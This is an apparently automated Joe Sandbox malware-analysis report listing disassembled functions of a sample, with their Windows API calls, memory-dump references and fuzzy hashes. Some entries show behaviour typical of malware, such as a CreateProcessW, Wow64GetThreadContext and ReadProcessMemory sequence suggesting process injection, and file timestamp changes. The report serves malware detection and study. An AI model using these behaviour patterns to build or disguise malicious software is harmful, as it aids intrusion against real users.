Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 08f83db2f1705d72b9ad0af17479e0ab32cb73145b7d4f76d35bc8be5e6d713f
Instruction ID: 489fb4fa2813a144f41ddc0093fe097a95cf3bc10a380b85a5aa54c51d37f909
Opcode Fuzzy Hash: 08f83db2f1705d72b9ad0af17479e0ab32cb73145b7d4f76d35bc8be5e6d713f
Instruction Fuzzy Hash: F5114571A10208BFDB208F64DC80EFEBBBCEF04750F108469E805D7250E6729E44BBA0

Function 01946C38 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 019473F3
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01947489
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 019474AB

Memory Dump Source

Source File: 00000000.00000002.2111882744.0000000001945000.00000040.00000020.00020000.00000000.sdmp, Offset: 01945000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1945000_EIvidclKOb.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
Instruction ID: ba716e6f8eb7ebf5e03310979ff83e1b36d600c9f125b10b181751e3bc510f4c
Opcode Fuzzy Hash: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
Instruction Fuzzy Hash: 04620C30A14258DBEB24CFA4C850BEEB776EF58301F1095A9D20DEB390E7759E81CB59

Function 00F6955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00F04EE5: _fseek.LIBCMT ref: 00F04EFD

Part of subcall function 00F69734: _wcscmp.LIBCMT ref: 00F69824
Part of subcall function 00F69734: _wcscmp.LIBCMT ref: 00F69837

_free.LIBCMT ref: 00F696A2
_free.LIBCMT ref: 00F696A9
_free.LIBCMT ref: 00F69714

Part of subcall function 00F22D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00F29A24), ref: 00F22D69
Part of subcall function 00F22D55: GetLastError.KERNEL32(00000000,?,00F29A24), ref: 00F22D7B

_free.LIBCMT ref: 00F6971C

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction ID: fae0ec8dfe3b05ab19cc30b9723e8cd068ba4c601bdabadac110cf220a413f90
Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction Fuzzy Hash: FC516FB1D04219AFDF249F64DC81A9EBBB9FF48300F10449EF609A3241DB756A90DF58

Function 00F2470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00F247A0
__flush.LIBCMT ref: 00F247C0
__write.LIBCMT ref: 00F247F3
__flsbuf.LIBCMT ref: 00F24821

Part of subcall function 00F28B28: __getptd_noexit.LIBCMT ref: 00F28B28

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction ID: 7054826a5d8072f43ffe1cdc753b55d8339624de99b8bd1705c8dfff0e199428
Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction Fuzzy Hash: 2841C675F00B669BDB18CF69E8809AE7BA5EF45370B24813DE825C7640D7B4ED41AB40

Function 00F07285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F3EA39
GetOpenFileNameW.COMDLG32(?), ref: 00F3EA83

Part of subcall function 00F04750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F04743,?,?,00F037AE,?), ref: 00F04770

Part of subcall function 00F20791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00F207B0

Strings

X, xrefs: 00F3EA51

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 428f06d0fd7c33c015c368adbfa8f0600cbdb0ca0f9de0c3f8e73ac3c5febf06
Instruction ID: b30a26fa5108ee5867fca334262af44d818149ffc3aa4843f038df9f9efd91f6
Opcode Fuzzy Hash: 428f06d0fd7c33c015c368adbfa8f0600cbdb0ca0f9de0c3f8e73ac3c5febf06
Instruction Fuzzy Hash: CA21A171A002589BCF41DF94DC45BEE7BF8AF48710F004059E408AB282DBB86989EFA1

Function 00F698E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00F698F8
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00F6990F

Strings

aut, xrefs: 00F69909

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: dcbbbd1d5e98b3abcb38d1acedd1517c18ca1d960cd83499da05c33debe92653
Instruction ID: b3ad8a387509dd7189f50b6510d1b63ca49c093832b0226fe1099efbe38ea839
Opcode Fuzzy Hash: dcbbbd1d5e98b3abcb38d1acedd1517c18ca1d960cd83499da05c33debe92653
Instruction Fuzzy Hash: E0D05E7958030DAFDB509BA0DC0EFEA773CE704700F0002B1BA54D10A1EAB095999B91

Function 00F7CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f03d0aac37e0488f09e6f078075df77113bc35a6aa81837d36d96c843dfddab
Instruction ID: 8a20ef29cf389603d19f40ed06adcd6f61f44a907bba0afa65a8147ad5c4523a
Opcode Fuzzy Hash: 5f03d0aac37e0488f09e6f078075df77113bc35a6aa81837d36d96c843dfddab
Instruction Fuzzy Hash: 5BF14C71A083019FC714DF28C880A6ABBE5FF88324F54892EF8999B351D774E945DF92

Function 00F0F76F Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 00F20162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F20193
Part of subcall function 00F20162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00F2019B
Part of subcall function 00F20162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F201A6
Part of subcall function 00F20162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F201B1
Part of subcall function 00F20162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00F201B9
Part of subcall function 00F20162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00F201C1

Part of subcall function 00F160F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00F0F930), ref: 00F16154

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00F0F9CD
OleInitialize.OLE32(00000000), ref: 00F0FA4A
CloseHandle.KERNEL32(00000000), ref: 00F445C8

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 9ab611360e6ddee7a49b76649422d465f4e68b5f2ad809ec628c3f2d5206f3fb
Instruction ID: 6a0cf409e8f2a45f660ce626f4144b605f6191ce85c1bf2676dfac222fa25ada
Opcode Fuzzy Hash: 9ab611360e6ddee7a49b76649422d465f4e68b5f2ad809ec628c3f2d5206f3fb
Instruction Fuzzy Hash: 5F81D3B0901A49CFC788DF29AF63E597BE5FB98B06750812AD009C7262E77464C4FF10

Function 00F0434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F04370
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F04415
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F04432

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 6e2c4c8afdf731d8eab123c89b265df9dcf60b903bfd95c3e283cba67bf8d12b
Instruction ID: e9aad63cfd0ef9d2d895cebc097246fb6005070456375fd7013cc19de9840264
Opcode Fuzzy Hash: 6e2c4c8afdf731d8eab123c89b265df9dcf60b903bfd95c3e283cba67bf8d12b
Instruction Fuzzy Hash: 5531C3B1904701CFD720DF24D885A9BBBF8FB48718F00092EE69A83291D771B948FB52

Function 00F2571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00F25733

Part of subcall function 00F2A16B: __NMSG_WRITE.LIBCMT ref: 00F2A192
Part of subcall function 00F2A16B: __NMSG_WRITE.LIBCMT ref: 00F2A19C

__NMSG_WRITE.LIBCMT ref: 00F2573A

Part of subcall function 00F2A1C8: GetModuleFileNameW.KERNEL32(00000000,00FC33BA,00000104,?,00000001,00000000), ref: 00F2A25A
Part of subcall function 00F2A1C8: ___crtMessageBoxW.LIBCMT ref: 00F2A308

Part of subcall function 00F2309F: ___crtCorExitProcess.LIBCMT ref: 00F230A5
Part of subcall function 00F2309F: ExitProcess.KERNEL32 ref: 00F230AE

Part of subcall function 00F28B28: __getptd_noexit.LIBCMT ref: 00F28B28

RtlAllocateHeap.NTDLL(018A0000,00000000,00000001,00000000,?,?,?,00F20DD3,?), ref: 00F2575F

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 8816e9974e0f4427a0b638d1439447fe31e3e3e7330d761d930b989a75ff2f25
Instruction ID: 549f33361896873e6adf2b5096e77bffe8f5e993abb7e2174a63fa22299a35fd
Opcode Fuzzy Hash: 8816e9974e0f4427a0b638d1439447fe31e3e3e7330d761d930b989a75ff2f25
Instruction Fuzzy Hash: 4001F172681B3ADBEA106738FC82B6E77888B82BB1F100429F8059B181DE788D017661

Function 00F698A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00F69548,?,?,?,?,?,00000004), ref: 00F698BB
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00F69548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00F698D1
CloseHandle.KERNEL32(00000000,?,00F69548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00F698D8

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 5b8f5e0c9d74bd5a6115c7b3ab1c1b9eace1bbb55f96294c8cd63e6df0617373
Instruction ID: bdd8a008cd22b72e4ba8d026355fd075f29f4640bf7c9402fe873d487ebc50c8
Opcode Fuzzy Hash: 5b8f5e0c9d74bd5a6115c7b3ab1c1b9eace1bbb55f96294c8cd63e6df0617373
Instruction Fuzzy Hash: 50E08632140618BBD7212B64EC0DFEA7B19EB06770F104220FB14A90E087B11525A798

Function 00F68D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00F68D1B

Part of subcall function 00F22D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00F29A24), ref: 00F22D69
Part of subcall function 00F22D55: GetLastError.KERNEL32(00000000,?,00F29A24), ref: 00F22D7B

_free.LIBCMT ref: 00F68D2C
_free.LIBCMT ref: 00F68D3E

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction ID: 133abd6429e591b84e1e4bb1c4390ae3ccac385e6478f6ebf53a215677c1c024
Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction Fuzzy Hash: EAE012B1A0161157CB64A578BD40A9363DC4F5C3A27540A1DB90DD7186CE68F853A174

Function 00F0A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 00F3FC01

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 2656d6a43d5c08599a267ddbe780cbe327efe49b7337aac99090a2e7ad997569
Instruction ID: ec84fcbf2d0cb09c3cd0d497552c77dceea250e216aad4808ef61138d86368ac
Opcode Fuzzy Hash: 2656d6a43d5c08599a267ddbe780cbe327efe49b7337aac99090a2e7ad997569
Instruction Fuzzy Hash: 57223771908301DFD724DF14C854B6ABBE1BF84314F15896DE89A8B2A2DB35EC45FB82

Function 00F04C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00F04CBA

Strings

EA06, xrefs: 00F3D8CC

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: e5d00720c224b8a3ca4609b948b940b9627ef50b3703537bcc99b315df5830d7
Instruction ID: a4b4614401ddb96589ca2ee9145035144fca03cc1d29dfd7c4c0faeb7adb9385
Opcode Fuzzy Hash: e5d00720c224b8a3ca4609b948b940b9627ef50b3703537bcc99b315df5830d7
Instruction Fuzzy Hash: 5A41AAE2E001586BDF218B64CC617BE7FA2DB01310F684064EE82DB2C2D634BD44B3A1

Function 00F07A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00F07AAB
_memmove.LIBCMT ref: 00F07B16

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 40fbce4a1fea4cfe3bf1a015a5a2827c9472d34ae18aa590b79f6fb0e3b65f37
Instruction ID: b25aa9f8068e00b1c7959d39310f843b3b6cd096065492443857ed1c9d2ecd94
Opcode Fuzzy Hash: 40fbce4a1fea4cfe3bf1a015a5a2827c9472d34ae18aa590b79f6fb0e3b65f37
Instruction Fuzzy Hash: 9131E7B2B04606AFC704EF68D8D1E69B3A5FF483207158269E419CB2D1EB34F910EB90

Function 00F047D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00F04834

Part of subcall function 00F2336C: __lock.LIBCMT ref: 00F23372
Part of subcall function 00F2336C: DecodePointer.KERNEL32(00000001,?,00F04849,00F57C74), ref: 00F2337E
Part of subcall function 00F2336C: EncodePointer.KERNEL32(?,?,00F04849,00F57C74), ref: 00F23389

Part of subcall function 00F048FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00F04915
Part of subcall function 00F048FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00F0492A

Part of subcall function 00F03B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F03B68
Part of subcall function 00F03B3A: IsDebuggerPresent.KERNEL32 ref: 00F03B7A
Part of subcall function 00F03B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00FC52F8,00FC52E0,?,?), ref: 00F03BEB
Part of subcall function 00F03B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00F03C6F

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00F04874

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: a6321418bae539edf291105a2bedb5cf567cb7d87ebe8a8cbfb9ed55b2b4fd51
Instruction ID: d4addffe734b3e83c29314f4090135ce01b3269bbcbae861993877fd720fc79e
Opcode Fuzzy Hash: a6321418bae539edf291105a2bedb5cf567cb7d87ebe8a8cbfb9ed55b2b4fd51
Instruction Fuzzy Hash: E31193B19083199FD700DF68ED0694EBBE8EF95750F50891EF440832B1DBB49949EB91

Function 00F20DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00F2571C: __FF_MSGBANNER.LIBCMT ref: 00F25733
Part of subcall function 00F2571C: __NMSG_WRITE.LIBCMT ref: 00F2573A
Part of subcall function 00F2571C: RtlAllocateHeap.NTDLL(018A0000,00000000,00000001,00000000,?,?,?,00F20DD3,?), ref: 00F2575F

std::exception::exception.LIBCMT ref: 00F20DEC
__CxxThrowException@8.LIBCMT ref: 00F20E01

Part of subcall function 00F2859B: RaiseException.KERNEL32(?,?,?,00FB9E78,00000000,?,?,?,?,00F20E06,?,00FB9E78,?,00000001), ref: 00F285F0

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 35ad24ecdba00f030769467208dbe9fd8032b7af93fcdac0f1e2de216e66c00f
Instruction ID: 4e7401c047066e9af084b2d56cdc1fbd25fa4c36b4e153545394dbcaa341401d
Opcode Fuzzy Hash: 35ad24ecdba00f030769467208dbe9fd8032b7af93fcdac0f1e2de216e66c00f
Instruction Fuzzy Hash: 09F0A43690223E76DB10FAA4FC119DEB7AC9F01361F104426F90496182DFB49A81F6D1

Function 00F253A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00F28B28: __getptd_noexit.LIBCMT ref: 00F28B28

__lock_file.LIBCMT ref: 00F253EB

Part of subcall function 00F26C11: __lock.LIBCMT ref: 00F26C34

__fclose_nolock.LIBCMT ref: 00F253F6

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
